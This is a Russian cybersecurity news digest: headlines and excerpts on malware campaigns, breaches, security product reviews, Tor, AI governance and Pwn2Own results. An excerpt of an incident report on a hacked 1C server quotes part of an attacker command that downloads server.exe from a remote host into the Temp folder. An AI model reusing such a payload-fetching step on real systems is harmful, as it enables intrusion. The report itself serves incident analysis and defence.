Кибербезопасность
👉 от %username%
Подборка ресурсов по кибербезопасности
На русском 🇷🇺
Securitylab
последний пост 1 час назад
Марс наконец получит нормальный интернет. НАСА ищет подрядчика — дедлайн 2030 год, опоздания не принимаются
Марс наконец получит нормальный интернет. НАСА ищет подрядчика — дедлайн 2030 год, опоздания не принимаются Марс наконец получит нормальный интернет. НАСА ищет подрядчика — дедлайн 2030 год, опоздания не принимаются

Новая сеть станет частью архитектуры, которая соединит Землю, Луну и Марс постоянными каналами.

1 час назад @ securitylab.ru
На Луну зайдем с черного хода. Физики удивили инженеров новым планом полета
На Луну зайдем с черного хода. Физики удивили инженеров новым планом полета

Учёные проверили 30 миллионов вариантов и нашли неочевидный путь через область между Землёй и Луной.

2 часа назад @ securitylab.ru
Хакеры Gamaredon сменили пластинку. Теперь они пакуют вирусы в старые архивы ARJ для обхода антивирусов
Хакеры Gamaredon сменили пластинку. Теперь они пакуют вирусы в старые архивы ARJ для обхода антивирусов Хакеры Gamaredon сменили пластинку. Теперь они пакуют вирусы в старые архивы ARJ для обхода антивирусов

12 волн Gamaredon через одну дыру в WinRAR.

3 часа назад @ securitylab.ru
США объявили Anthropic угрозой нацбезопасности. Но сначала — пусть найдёт все дыры в государственных сетях
США объявили Anthropic угрозой нацбезопасности. Но сначала — пусть найдёт все дыры в государственных сетях

Ну и что, что они враги? Claude слишком хорош, чтобы им не воспользоваться.

4 часа назад @ securitylab.ru
Думаете, ваши голосовые в WhatsApp защищены? Вот список расширений, которые перехватывают аудио перед отправкой
Думаете, ваши голосовые в WhatsApp защищены? Вот список расширений, которые перехватывают аудио перед отправкой Думаете, ваши голосовые в WhatsApp защищены? Вот список расширений, которые перехватывают аудио перед отправкой

148 тысяч установок под видом CRM для бизнеса.

4 часа назад @ securitylab.ru
Debian обязал разработчиков доказывать «чистоту» своего кода
Debian обязал разработчиков доказывать «чистоту» своего кода

Система миграции Debian начала автоматически блокировать пакеты, которые не проходят тест воспроизводимости.

5 часов назад @ securitylab.ru
Роскомнадзор просят фильтровать популярный юмор. Шутку «сикс-севен» приравняли к угрозе нацбезопасности
Роскомнадзор просят фильтровать популярный юмор. Шутку «сикс-севен» приравняли к угрозе нацбезопасности

Общественники требуют от Роскомнадзора заблокировать школьный мем про шесть и семь.

6 часов назад @ securitylab.ru
VPN, просевший трафик и минус 7 млрд руб. Как новые требования Минцифры ударили по маркетплейсам
VPN, просевший трафик и минус 7 млрд руб. Как новые требования Минцифры ударили по маркетплейсам VPN, просевший трафик и минус 7 млрд руб. Как новые требования Минцифры ударили по маркетплейсам

Маркетплейсы сообщили о падении мобильного трафика на фоне ограничений VPN.

7 часов назад @ securitylab.ru
В стандартных функциях PHP для JPEG нашли раскрытие данных из памяти и переполнение буфера
В стандартных функциях PHP для JPEG нашли раскрытие данных из памяти и переполнение буфера

Один баг получил CVE-2025-14177, второй представляет собой heap buffer overflow в iptcembed при копировании входного потока.

7 часов назад @ securitylab.ru
Держите криптовалюту в Transit Finance? Проверьте кошельки после атаки на сеть TRON
Держите криптовалюту в Transit Finance? Проверьте кошельки после атаки на сеть TRON

После взлома Transit Finance предупредила пользователей о росте мошеннических сообщений в сети.

8 часов назад @ securitylab.ru
В Германии задержали предполагаемого главу наркоплощадки Dream Market. Следствие считает, что он менял крипту на золото и отправлял слитки себе домой
В Германии задержали предполагаемого главу наркоплощадки Dream Market. Следствие считает, что он менял крипту на золото и отправлял слитки себе домой В Германии задержали предполагаемого главу наркоплощадки Dream Market. Следствие считает, что он менял крипту на золото и отправлял слитки себе домой

Dream Market закрылся в 2019 году, но деньги продолжили двигаться.

9 часов назад @ securitylab.ru
Shai-Hulud в открытом доступе. Теперь любой желающий может похищать токены GitHub, SSH-ключи и криптокошельки — инструкция прилагается
Shai-Hulud в открытом доступе. Теперь любой желающий может похищать токены GitHub, SSH-ключи и криптокошельки — инструкция прилагается

Астрологи объявили неделю атак на цепочку поставок.

9 часов назад @ securitylab.ru
PDF с подвохом: Paper Werewolf снова атакует российские компании через фальшивый Adobe Reader
PDF с подвохом: Paper Werewolf снова атакует российские компании через фальшивый Adobe Reader

Новый стилер крадёт файлы, пароли и данные Telegram.

9 часов назад @ securitylab.ru
Россияне боятся остаться без связи больше, чем без здоровья. Ковид позабыт, интернет — в панике
Россияне боятся остаться без связи больше, чем без здоровья. Ковид позабыт, интернет — в панике

Интернет-ограничения превратились из политической новости в бытовую проблему номер один.

10 часов назад @ securitylab.ru
«Мы всё удалили, честно». Хакеры похитили данные 275 млн человек — а теперь просят поверить им на слово
«Мы всё удалили, честно». Хакеры похитили данные 275 млн человек — а теперь просят поверить им на слово «Мы всё удалили, честно». Хакеры похитили данные 275 млн человек — а теперь просят поверить им на слово

Сделка должна была поставить точку, но вместо этого оставила самый неудобный вопрос.

11 часов назад @ securitylab.ru
Anti-Malware Anti-Malware
последний пост 13 часов назад
Сравнение российских сервисов (услуг) по защите от DDoS-атак — 2026, часть II
Сравнение российских сервисов (услуг) по защите от DDoS-атак — 2026, часть II Сравнение российских сервисов (услуг) по защите от DDoS-атак — 2026, часть II

Продолжаем сравнивать российские сервисы защиты от DDoS-атак по их технологическому профилю, гарантиям провайдеров (SLA), условиям технической поддержки, возможностям кастомизации и пр.

ВведениеВ первой части сравнения услуг по защите от DDoS-атак мы рассказали о том, какими функциями, возможностями и особенностями обладают сервисы от российских ИТ-компаний и ИБ-вендоров CURATOR, DDoS-Guard, Kaspersky, NGENIX и StormWall.

Сопоставительная таблица содержит сведения по тем же критериям сравнения, которые использовались при детальном описании услуг CURATOR.ANTIDDOS, DDoS-Guard, Kaspersky DDoS Protection, «NGENIX Защита от DDoS-атак» и «StormWall Защита от DDoS-атак».

В рамках L7-защиты (Web DD…

13 часов назад @ anti-malware.ru
Обзор DAST-продуктов для динамического тестирования безопасности приложений
Обзор DAST-продуктов для динамического тестирования безопасности приложений Обзор DAST-продуктов для динамического тестирования безопасности приложений

Место DAST в DevSecOpsМетодика DAST строится на симуляции атак на работающее приложение, позволяющей объективно оценить его устойчивость к реальным рискам.

SAST и SCA эффективны на этапе написания кода, DAST — на этапе тестирования работающего приложения, IAST — для глубокого анализа с контекстом.

Обзор отечественных DAST-решенийНа российском рынке представлено несколько типов DAST-решений, предназначенных для динамического анализа безопасности приложений.

Схема DAST-анализа в Solar appScreenerОсобенности решения:Единая технологическая платформа для комплексного анализа безопасности приложений при помощи модулей SAST, DAST и OSA.

Важно чётко представлять, под какие задачи выбирать тот или и…

1 day, 9 hours назад @ anti-malware.ru
Топ-7 ошибок в управлении секретами: разбор примеров
Топ-7 ошибок в управлении секретами: разбор примеров Топ-7 ошибок в управлении секретами: разбор примеров

Ручное управление добавляет нагрузку на сотрудников: один специалист тратит в среднем 25 минут в день на операции с секретами, что повышает вероятность ошибок и человеческого фактора.

В итоге подобные просчёты в работе с секретами приводят к их компрометации и последующим потерям.

О факте утечки впервые сообщила компания GitGuardian, которая отслеживает GitHub на наличие секретных токенов, учётных данных для баз данных и сертификатов.

В течение этого периода секрет используется для подтверждения личности пользователя и предоставления доступа к ресурсам в рамках заданных прав.

В рамках атаки посредника (AitM) злоумышленник может не только просматривать передаваемые данные, но и модифицироват…

1 day, 13 hours назад @ anti-malware.ru
9 ошибок внедрения EDR/XDR, которые снижают эффективность защиты
9 ошибок внедрения EDR/XDR, которые снижают эффективность защиты 9 ошибок внедрения EDR/XDR, которые снижают эффективность защиты

Система опирается только на внешние сигналы, и SOC реагирует уже на поздних стадиях.

Атаки MFA‑fatigue и отсутствие связи между сигналамиВ атаках MFA-fatigue злоумышленники давят на пользователя, а не на защиту.

Как только защита развёрнута только на серверах или только на ноутбуках, появляются зоны, через которые злоумышленники спокойно проникают в сеть и развивают атаку.

SOC тратит время на шум, пропускает критичные события, а EDR/XDR превращаются в панель мониторинга, а не в инструмент обнаружения атак.

Чем выше доля автоматизации, тем меньше нагрузка на SOC и тем быстрее блокируются типовые сценарии.

2 days, 5 hours назад @ anti-malware.ru
Российские SAST-системы: обзор решений для статического анализа кода
Российские SAST-системы: обзор решений для статического анализа кода Российские SAST-системы: обзор решений для статического анализа кода

Исходный код сначала преобразуется во внутреннее представление, после чего применяются алгоритмы анализа и правила поиска уязвимостей.

Деобфускация направлена на устранение механизмов запутывания кода, которые применяются для усложнения анализа и сокрытия реальной функциональности программы.

Российский рынок SASTВ 2025 году проведён цикл испытаний статических анализаторов исходного кода при организационной и методической поддержке ФСТЭК России.

Испытания позволили проверить соответствие инструментов требованиям стандарта ГОСТ Р 71207–2024, а также выявить особенности практического применения средств статического анализа исходного кода.

АИСТ-САИСТ-С — анализатор исходных текстов C и C++-прог…

2 days, 13 hours назад @ anti-malware.ru
Обзор решений класса Security Orchestration, Automation and Response (SOAR)
Обзор решений класса Security Orchestration, Automation and Response (SOAR) Обзор решений класса Security Orchestration, Automation and Response (SOAR)

Системы SOAR (Security Orchestration, Automation and Response) позволяют собирать данные о событиях ИБ из различных источников и обрабатывать их.

Именно к таким средствам относят системы класса «оркестрация, автоматизация и реагирование на инциденты информационной безопасности» (Security Orchestration, Automation, and Response, SOAR).

Решения класса SOARФункции решений SOAR и IRP во многом пересекаются, поэтому ранее их часто относили к единой линейке — SOAR/IRP.

ASoarASoar — это отечественная платформа класса «оркестрация, автоматизация и реагирование на инциденты информационной безопасности» (Security Orchestration, Automation, and Response, SOAR), которая выступает в роли координатора си…

3 days, 11 hours назад @ anti-malware.ru
Сравнение российских сервисов (услуг) по защите от DDoS-атак — 2026, часть I
Сравнение российских сервисов (услуг) по защите от DDoS-атак — 2026, часть I Сравнение российских сервисов (услуг) по защите от DDoS-атак — 2026, часть I

Критерии выбора сервиса (услуги) по защите от DDoSНа рынке услуг защиты от DDoS-атак сейчас нет недостатка ни в предложениях, ни в технологиях.

Методология сравнения услуг по защите от DDoS-атакВ сравнении участвуют российские поставщики услуг по защите веб-приложений, сайтов и сетей от DDoS-атак, имеющие программное обеспечение собственной разработки в реестре Минцифры России.

Характеризует внутреннее устройство услуги: географию точек присутствия, оборудование и ПО в ЦОДах, режимы защиты и т. д.Блок № 4 — «Разновидности защиты».

Результаты анализа применяются для классификации трафика и принятия решений о его блокировке либо дополнительной валидации Технологии машинного обучения и искусст…

3 days, 13 hours назад @ anti-malware.ru
Заменит ли ИИ человека: что ждать от эры Agentic AI
Заменит ли ИИ человека: что ждать от эры Agentic AI Заменит ли ИИ человека: что ждать от эры Agentic AI

Приход эры Agentic AI породил мнение, что ИИ способен потеснить или даже заменить человека.

Например, можно ли использовать единую концепцию ИИ для построения всех ИИ-систем, если уже сейчас выявлено несколько различных типов таких систем?

(International AI Safety Report, 2026)Признаки отличий человека и ИИМы вплотную подошли к главному вопросу: в чём разница между человеком и ИИ?

Доверие человека к ИИ не формируется само по себе.

Приведённый список отличий человека и ИИ ясно показывает, что между ними сохраняется множество принципиальных различий.

1 week назад @ anti-malware.ru
Обзор систем управления ключевыми носителями и цифровыми сертификатами (PKI)
Обзор систем управления ключевыми носителями и цифровыми сертификатами (PKI) Обзор систем управления ключевыми носителями и цифровыми сертификатами (PKI)

Сегодня на отечественном рынке представлен широкий выбор систем управления ключевыми носителями и цифровыми сертификатами.

Основы и назначение систем PKIПод термином инфраструктура открытых ключей (Public Key Infrastructure, PKI) в сфере информационной безопасности понимают совокупность стандартов, ролей, политик и процедур для управления цифровыми сертификатами.

Для этого система управляет полным жизненным циклом цифровых сертификатов: от их генерации и распространения до использования, хранения и своевременного отзыва.

Государственные службы применяют PKI для цифровой идентификации граждан, защиты информационных систем госорганов и обеспечения юридической силы электронных документов в адм…

1 week назад @ anti-malware.ru
Почему проекты внедрения ИИ проваливаются и как сделать их успешными
Почему проекты внедрения ИИ проваливаются и как сделать их успешными Почему проекты внедрения ИИ проваливаются и как сделать их успешными

Там так или иначе поднимается вопрос внедрения ИИ, в том числе практические аспекты.

А на технологических конференциях при анонсе новых продуктов или сервисов всячески подчёркивается, как и где применяется ИИ и как он помогает покупателям и заказчикам внедрять свои решения на его основе.

Завершило мероприятие круглое обсуждение «ИИ не для разговоров, а для задач.

Участники дискуссии «ИИ не для разговоров, а для задач.

Плохо просчитанная экономикаВторой по значимости проблемой при реализации проектов внедрения ИИ в последнее время, когда ИТ-бюджеты снижаются, стала экономика.

1 week, 1 day назад @ anti-malware.ru
Как растущий Agentic AI меняет образование в сфере ИБ
Как растущий Agentic AI меняет образование в сфере ИБ Как растущий Agentic AI меняет образование в сфере ИБ

Сравнение возможностей человека и ИИ показывает, что классическое образование не только сохранится, но и обеспечит технологический суверенитет.

«Мы видим свою миссию в развитии ИБ в целом, в развитии экосистемы сетевого доверия и продвижении подходов ИБ», — заявил руководитель UserGate.

Но как это соотносится с возможными изменениями в образовательном процессе с приходом эры агентных ИИ (Agentic AI)?

Другие считают, что произойдёт сдвиг в наборе востребованных навыков, но в целом это будет не революционный, а линейный процесс развития.

Самое важное — такой подход не только остаётся базовым, но и его роль будет возрастать по мере развития Agentic AI.

1 week, 1 day назад @ anti-malware.ru
Квантовые технологии в ИБ: как российские компании переходят от пилотов к внедрению
Квантовые технологии в ИБ: как российские компании переходят от пилотов к внедрению Квантовые технологии в ИБ: как российские компании переходят от пилотов к внедрению

Данное исследование стало вторым, посвящённым анализу сценариев применения квантовых технологий в России.

Причём, как подчеркнула Анна, продукты с использованием квантовых технологий способны защищать не только от перспективных, но и актуальных угроз.

Уровень развития технологий по 10-балльной системе разных технологий, примеры внедрения которых изучались в ходе исследования, составлял от 3 до 9.

Также, как рассказал Антон Гугля, появляется всё больше оборудования, в которое можно добавить поддержку квантовых технологий с помощью замены прошивки.

Прогноз объёмов мирового рынка квантовых технологий (млрд долларов США)Fortune Business Insight прогнозирует к 2030 году семикратный рост рынка кв…

1 week, 2 days назад @ anti-malware.ru
Identity Governance and Administration: как построить зрелую систему управления доступом
Identity Governance and Administration: как построить зрелую систему управления доступом Identity Governance and Administration: как построить зрелую систему управления доступом

Она управляет жизненным циклом учётных записей: создаёт их при приёме, корректирует права при переводах, блокирует при увольнении.

В отличие от базового IDM, IGA работает не только с людьми, но и с сервисными аккаунтами, API-ключами и машинными идентичностями.

Инвентаризация показывает реальную картину: где затерялись забытые аккаунты, какие права не используются, какие системы не интегрированы.

Что мониторят:Жизненный цикл учётных записей — скорость создания учётных записей и базовых прав при приёме, своевременность изменения прав при переводе, время блокировки аккаунта после увольнения.

Сервисные аккаунты — сколько технических учётных записей находится под управлением IGA и проходят ли он…

1 week, 2 days назад @ anti-malware.ru
Реагирование на инциденты в ИБ: как минимизировать ущерб от кибератак
Реагирование на инциденты в ИБ: как минимизировать ущерб от кибератак Реагирование на инциденты в ИБ: как минимизировать ущерб от кибератак

Вопрос для бизнеса уже не в том, случится ли атака, а в том, насколько быстро и грамотно организация сможет на неё отреагировать и минимизировать последствия.

Скорость и качество реагирования на инциденты в области информационной безопасности напрямую влияют на бизнес-показатели.

Константин Мушовец порекомендовал компаниям, выстраивающим систему реагирования на инциденты, в первую очередь обратить внимание на решения класса EDR.

Использование ИИ при реагировании на инцидентыАлександр Григорян рассказал, что его департамент разрабатывает собственный инструментарий для расследования и реагирования на инциденты на всех этапах жизненного цикла.

Ключевая проблема многих организаций кроется не в …

1 week, 3 days назад @ anti-malware.ru
Как уведомления на iPhone сохраняют текст ваших сообщений и что с этим делать
Как уведомления на iPhone сохраняют текст ваших сообщений и что с этим делать Как уведомления на iPhone сохраняют текст ваших сообщений и что с этим делать

Согласно судебным документам, речь шла не о взломе Signal, не о компрометации его серверов и не о расшифровке трафика.

Обновление вышло 22 апреля 2026 года и доступно для iPhone 11 и новее, а также для ряда iPad; параллельно Apple выпустила исправления и для старой ветки iOS / iPadOS 18.7.8.

Сначала сообщение поступало в Signal на iPhone.

Отключить содержимое уведомлений в мессенджерахНапример, в случае Telegram на iOS это делается через «Настройки» → «Приложения» → «Telegram» → «Уведомления» → «Показывать содержимое».

ВыводыЭтот инцидент не дискредитирует мессенджеры и Signal в частности и не доказывает бесполезность сквозного шифрования.

1 week, 3 days назад @ anti-malware.ru
Хабр: ИБ Хабр: ИБ
последний пост 9 часов назад
[Перевод] В логах Kibana лежат тест-кейсы. Вот CLI, чтобы их достать. С auth, заскрабленным по умолчанию
[Перевод] В логах Kibana лежат тест-кейсы. Вот CLI, чтобы их достать. С auth, заскрабленным по умолчанию [Перевод] В логах Kibana лежат тест-кейсы. Вот CLI, чтобы их достать. С auth, заскрабленным по умолчанию

Каждый спринт мы экспортируем JSON из Kibana, листаем сотни записей и говорим себе, что потом превратим их в тест-кейсы.

Как это работаетpip install secure-log2test secure-log2test data/sample_kibana_export.json --output tests_generated.py pytest tests_generated.py -vВ репо лежит sample-экспорт, можно увидеть реальный output без поднятия Kibana.

Баг живёт в зазоре между «что делает моя dev-машина по дефолту» и «что делает Windows-shell по дефолту».

Не строит последовательности запросов и не определяет зависимости.

Но начинаете с работающего кода, а не с чистого файла и стопки логов.

9 часов назад @ habr.com
Комплексный подход к корпоративной кибербезопасности. Разговор с директором UserGate uFactor Дмитрием Шулининым
Комплексный подход к корпоративной кибербезопасности. Разговор с директором UserGate uFactor Дмитрием Шулининым Комплексный подход к корпоративной кибербезопасности. Разговор с директором UserGate uFactor Дмитрием Шулининым

Находясь на конференции UserGate Conf, я думал: а с кем бы поговорить на тему современных киберугроз и построения эффективной защиты.

Все данные, обрабатываемые SOC, не уходят в облачные модели — они работают внутри нашей локальной модели.

Злоумышленник зачастую знает и может протестировать в лабораторных средах средства защиты жертвы — найти методы их обхода.

Это может быть рабочим изменением, но иногда указывает на аномалию, которая при изучении может показать следы целевой атаки.

Какие методы безопасности — сегментация сети, парольная политика — доказали свою эффективность против APT-атак и с чем это связано?

9 часов назад @ habr.com
Страшно, когда не видно: темные тайны систем виртуализации
Страшно, когда не видно: темные тайны систем виртуализации Страшно, когда не видно: темные тайны систем виртуализации

Чтобы компоненты взаимодействовали там, где нужно, и не взаимодействовали там, где не нужно, администраторы организуют виртуальные сети, сегментируют трафик, настраивают изоляцию.

Выключенные ВМ при сканировании самого vCenter не создаются, и в гриде мы их не видим.

Сканирование vCenter только по API и не сканировать по SSHТретий вопрос: можно ли сканировать vCenter только по API, без SSH?

Да, это не будет таким богатым аудитом, как в случае с vCenter, но эти компоненты больше информации не дадут в любом случае.

Другие статьи цикла:Страшно, когда не видно: взгляд внутрь доменаСтрашно, когда не видно: аудит сетевых устройствСтрашно, когда не видно: управление активами как фундамент кибербезо…

10 часов назад @ habr.com
AI Governance по‑инженерному: что должен знать архитектор
AI Governance по‑инженерному: что должен знать архитектор AI Governance по‑инженерному: что должен знать архитектор

1 — AI Governance как баланс между скоростью инноваций и контролем рисковЯ смотрю на AI Governance не как юрист и не как продакт.

С этого момента я понял: AI Governance — это не про бумажки.

Три ключевых тренда AI Governance в 2026 годуТеперь давайте разложу, что изменилось и на чём фокусируются сильные команды.

3 — Принципиальная схема: конвейер AI Governance на этапах жизненного цикла моделиAI Governance — это не разовая проверка перед релизом, а непрерывный конвейер, встроенный во все этапы жизни модели.

Вывод: архитектор — это стратег, а не надзирательКогда я начинал разбираться в AI Governance, мне казалось, что это набор ограничений, который мешает быстро пилить фичи.

11 часов назад @ habr.com
[Перевод] Иголка в стоге сена: как LLM помогают искать уязвимости
[Перевод] Иголка в стоге сена: как LLM помогают искать уязвимости [Перевод] Иголка в стоге сена: как LLM помогают искать уязвимости

Это и есть проблема иголки в стоге сена в ее чистом виде.

Просто создали модель угроз, отдали ее LLM, и теперь модель углубленно исследует кодовую базу в поиске уязвимостей, которые попадают в эту модель.

Когда вы закончите искать уязвимости из тех же категорий, что и ранее раскрытые CVE, попробуйте определить точки входа: HTTP-маршруты, RPC-обработчики, потребители сообщений, CLI-точки входа и запланированные задачи.

Добавлять в нее новое и опираться на модель, чтобы приоритизировать находки и в конечном счете их валидировать.

Вместо старта с «этот код, скорее всего, нормальный» она начинает с «в этом коде есть подтвержденные баги, значит, вероятность дополнительных багов выше».

11 часов назад @ habr.com
Криптографический алгоритм «Криптонита» S3G-5G для безопасности сетей 5G прошёл этап согласования в ТК 26
Криптографический алгоритм «Криптонита» S3G-5G для безопасности сетей 5G прошёл этап согласования в ТК 26 Криптографический алгоритм «Криптонита» S3G-5G для безопасности сетей 5G прошёл этап согласования в ТК 26

Разработанный в компании «Криптонит» (входит в «ИКС Холдинг») алгоритм S3G-5G прошёл новый этап согласования: Технический комитет 26 (ТК 26) по стандартизации «Криптографическая защита информации» утвердил методические рекомендации по его применению.

Алгоритм представляет собой российский аналог криптографических функций 3GPP (f1–f5), предназначенных для выработки вспомогательных секретных ключей и аутентификационных векторов в сетях подвижной радиотелефонной связи пятого поколения (5G).

В связке со схемой ECIES и протоколом 5G-AKA-GOST, S3G-5G позволяет абонентам проходить аутентификацию в сетях 5G, сохраняя при этом анонимность.

За два следующих года разработчики получили и учли комментар…

12 часов назад @ habr.com
Я написал свой DNS-резолвер на Go вместо того, чтобы взять Unbound. Вот почему и что из этого вышло
Я написал свой DNS-резолвер на Go вместо того, чтобы взять Unbound. Вот почему и что из этого вышло Я написал свой DNS-резолвер на Go вместо того, чтобы взять Unbound. Вот почему и что из этого вышло

Поэтому query log живёт в кольцевом буфере в памяти, async-шипится в ClickHouse в Хельсинки, и всё.

Почему Go, а не Rust/C++Короткий ответ: я знаю Go и не знаю Rust на уровне «писать сетевую системную программу под нагрузкой».

Я в итоге включил его опционально: для большинства юзеров он сейчас mostly cosmetic (95% доменов всё равно без подписи), а baggage серьёзный.

Что бы я сделал по-другомуВключил бы pprof и continuous profiling с первого дня.

Зачем open-source edge: я хочу, чтобы юзер мог поднять свой собственный экземпляр и убедиться, что мы не врём про «не пишем на диск».

13 часов назад @ habr.com
Почему без архитектора контента невозможно масштабировать документацию компании
Почему без архитектора контента невозможно масштабировать документацию компании Почему без архитектора контента невозможно масштабировать документацию компании

Он позволит создавать, редактировать, сохранять и публиковать различный продуктовый контент как в виде электронных документов, так и в виде онлайн‑справки.

Просмотр истории и статусов перевода, автоматическая выгрузка контента на перевод при изменении исходных материалов, поддержка перевода глоссария.

Архитектор контента поможет вам оценить соответствие инструмента вашим реальным информационным потребностям, масштабируемость структуры данных и будущие расходы на поддержку контента.

Структурирование контента в базеКогда инструмент выбран, вы можете приступить к миграции вашего контента или к его созданию с нуля.

Эта автоматизация невозможна без архитектора контента, глубоко погруженного в пр…

1 day, 3 hours назад @ habr.com
AI/LLM Firewall на практике: сценарии атак и методы защиты
AI/LLM Firewall на практике: сценарии атак и методы защиты AI/LLM Firewall на практике: сценарии атак и методы защиты

Также и для защиты на текущий момент есть два основных блока инструментов для защиты: AI/LLM Firewall обеспечивает безопасность модели во время исполнения, а сканер ML Red Teaming позволяет проверять модель на уязвимости.

Отдельной и очень большой областью остается вопрос контроля данных и действий самих моделей.

Варианты применения AI/LLM Firewall и соответствие угрозамРассмотрим ключевые сценарии использования AI/LLM Firewall и то, каким техникам ATLAS и рискам OWASP они противостоят.

Функция AI/LLM Firewall Сценарии использования AI/LLM Firewall Техники MITRE ATLAS Риски OWASP LLM Top 10 1.

На уровне данных (RAG Firewall) – проверка документов, загружаемых в векторные базы данных для защ…

1 day, 6 hours назад @ habr.com
История одного инцидента, или почему не стоит публиковать 1С
История одного инцидента, или почему не стоит публиковать 1С История одного инцидента, или почему не стоит публиковать 1С

Системные администраторы обратившейся к нам компании заметили в своей инфраструктуре новые учетные записи, которых там быть не должно было.

Однако уже на этапе первичного анализа данных с сервера 1С стало очевидно, что именно он является наиболее вероятной точкой входа.

Если от легитимного прикладного процесса (например, сервера 1С, веб-сервера, СУБД) появляются дочерние процессы cmd.exe или PowerShell — это верный признак атаки на сервис.

]253:10011/server.exe C:\Users\[username]\AppData\Local\Temp\server.exe""К сожалению, как это часто бывает, настройки аудита в инфраструктуре оставляли желать лучшего, и информации в журналах не так много, как хотелось бы.

Предположительно, злоумышленники…

1 day, 7 hours назад @ habr.com
Месяц, который Telegram пережил в России: от Бони до 14 мая
Месяц, который Telegram пережил в России: от Бони до 14 мая Месяц, который Telegram пережил в России: от Бони до 14 мая

— С мобильного и с домашнего — главное VPN, и все функции, голосовые, видео доступны?

Что именно поменялось технически, сообщество разобрало в показательной статье «Telegram обошёл блокировку РКН» — нет, не Telegram на Хабре.

Технически Premium-клиент автоматически подключается через встроенный в Telegram MTProto-прокси, который сложнее отследить и заблокировать, потому что он не публичный и не лежит в открытых каталогах.

Поэтому сидеть 24/7 на полном туннеле в РФ неудобно — заворачивайте в VPN только Telegram и пару нужных доменов, остальное пускайте напрямую.

Со дна постучали не Telegram и не РКН.

1 day, 7 hours назад @ habr.com
Смерть от тысячи алертов: как отфильтровать мусор из TI-фидов
Смерть от тысячи алертов: как отфильтровать мусор из TI-фидов Смерть от тысячи алертов: как отфильтровать мусор из TI-фидов

Вот только проблема не в TI, а в том, что сырые фиды никто не должен использовать в проде.

В статье поговорим, почему именно так происходит, какие фиды стоит брать, а какие выкидывать, и как не превратить TI в генератор ложных срабатываний.

Фиды — это как раз топливо для этого двигателя.

Хотя дело не в фидах, а в том, что из миллиона записей никто не попытался оставить двести действительно актуальных.

Суть не в том, хороший это индикатор или плохой, а в том, когда его видели в последний раз и в каком контексте.

1 day, 11 hours назад @ habr.com
Еще один шаг в сторону объяснимого ИИ. Anthropic научилась читать скрытые состояния LLM
Еще один шаг в сторону объяснимого ИИ. Anthropic научилась читать скрытые состояния LLM Еще один шаг в сторону объяснимого ИИ. Anthropic научилась читать скрытые состояния LLM

Перед разбором сначала разберемся, что такое стиринг-вектор: Это вектор в том же векторном пространстве что и векторы активаций.

Анализ переключения языка по пяти транскриптамВыяснилось, что в обучающих данных переведённые промпты были случайно спарены с непереведёнными ответами.

Вычислили разность векторов для rewarded и penalized, добавили в в NLA-объяснении этот стиринг, и модель начала выдавать нечётные.

Надо учесть, что Вербализатор активаций — это языковая модель, и она делает то же, что и любая LLM: достраивает правдоподобные детали.

Если же в тексте «упоминается ван Чунджон» — а в оригинале его нет — AR попытается закодировать вектор «Чунджон».

1 day, 13 hours назад @ habr.com
Как работает Tor Browser: луковая маршрутизация, цепочки, мосты и слабые места
Как работает Tor Browser: луковая маршрутизация, цепочки, мосты и слабые места Как работает Tor Browser: луковая маршрутизация, цепочки, мосты и слабые места

Tor Browser и Tor — это разные слои одной системыTor Browser — это браузер на базе Firefox ESR, который настроен так, чтобы весь веб-трафик шёл через сеть Tor.

Почему маршрутизация «луковая»Когда Tor-клиент строит цепочку, он не берёт три случайных сервера и не кидает через них обычный запрос к сайту.

Как Tor выбирает узлыЧто видят провайдер, сайт и узлы TorСамая частая ошибка — думать, что Tor делает пользователя невидимым для всех.

Как Tor Browser борется с fingerprintingПочему JavaScript в Tor — больная темаJavaScript нужен современному вебу.

obfs4 пытается сделать трафик менее похожим на Tor и усложнить активное сканирование мостов.

2 days, 4 hours назад @ habr.com
[Перевод] Схема 4-3-2 на фоне 3-2-1 и 3-2-1-1-0: в чём разница
[Перевод] Схема 4-3-2 на фоне 3-2-1 и 3-2-1-1-0: в чём разница [Перевод] Схема 4-3-2 на фоне 3-2-1 и 3-2-1-1-0: в чём разница

В первой статье мы разобрали классическую схему и упомянули, что современная индустрия достроила к ней два этажа — 3-2-1-1-0 и 4-3-2.

Во второй мы перевели подробный материал AvePoint про 3-2-1-1-0 и пообещали отдельный текст про 4-3-2.

Этот текст о том, почему 3-2-1 уступает место более продуманным стратегиям и в чём разница между классическим правилом и его наследниками — 3-2-1-1-0 и 4-3-2, — и как выбрать схему под конкретную задачу.

Это 3-2-1-1-0 и 4-3-2.

Этот раздел в оригинале довольно подробный, но мы детально разобрали схему 3-2-1-1-0 в предыдущем переводе материала AvePoint.

2 days, 6 hours назад @ habr.com
Хакер Хакер
последний пост 2 часа назад
Второй ежеквартальный «Хакер» ушел в печать
Второй ежеквартальный «Хакер» ушел в печать Второй ежеквартальный «Хакер» ушел в печать

Второй ежеквартальный номер «Хакера» уже передан в типографию.

Так как тираж ограничен, и допечатки мы не планируем, свободных экземпляров становится все меньше.

Поэтому если ты еще не оформил заказ — сейчас самое время.

Ежеквартальный «Хакер» — глянцевое издание объемом 240 полос (вдвое больше журналов образца 2015 года), которое выходит четыре раза в год.

Во втором ежеквартальном выпуске тебя ждут практические статьи, хардкорные разборы и материалы, которые хочется сохранить на полке, а не потерять в браузерных вкладках.

2 часа назад @ xakep.ru
В Android 17 появится дополнительная защита от мошеннических звонков и функция Intrusion Logging
В Android 17 появится дополнительная защита от мошеннических звонков и функция Intrusion Logging В Android 17 появится дополнительная защита от мошеннических звонков и функция Intrusion Logging

В Android 17 появится система, которая сможет распознавать поддельные звонки якобы «из банка» и автоматически разрывать соединение.

Так, если на устройство поступает звонок, который выглядит как вызов от банка, Android проверит его через установленное банковское приложение.

Хотя нововведение дебютирует вместе с Android 17, впоследствии в Google обещают распространить его и на более старые устройства под управлением Android 11 и новее.

В частности, в Android запретят доступ к API Accessibility Services для приложений, которые не обозначены как инструменты для помощи людям с ограниченными возможностями, отключат device-to-device unlocking и поддержку WebGPU в Chrome, а в уведомлениях чатов по…

3 часа назад @ xakep.ru
На Pwn2Own Berlin показали взлом Windows 11 и Microsoft Edge
На Pwn2Own Berlin показали взлом Windows 11 и Microsoft Edge На Pwn2Own Berlin показали взлом Windows 11 и Microsoft Edge

В первый день исследователи заработали 523 000 долларов США, продемонстрировав 24 уникальных 0-day-уязвимости в Windows, браузерах, LLM-инструментах и контейнерных решениях.

Исследовательница заработала 20 000 долларов США за взлом Red Hat Linux for Workstations и еще 50 000 долларов США за 0-day в NVIDIA Container Toolkit.

После первого дня лидерство удерживает команда DEVCORE Research Team с результатом 205 000 долларов США и 20,5 очка Master of Pwn.

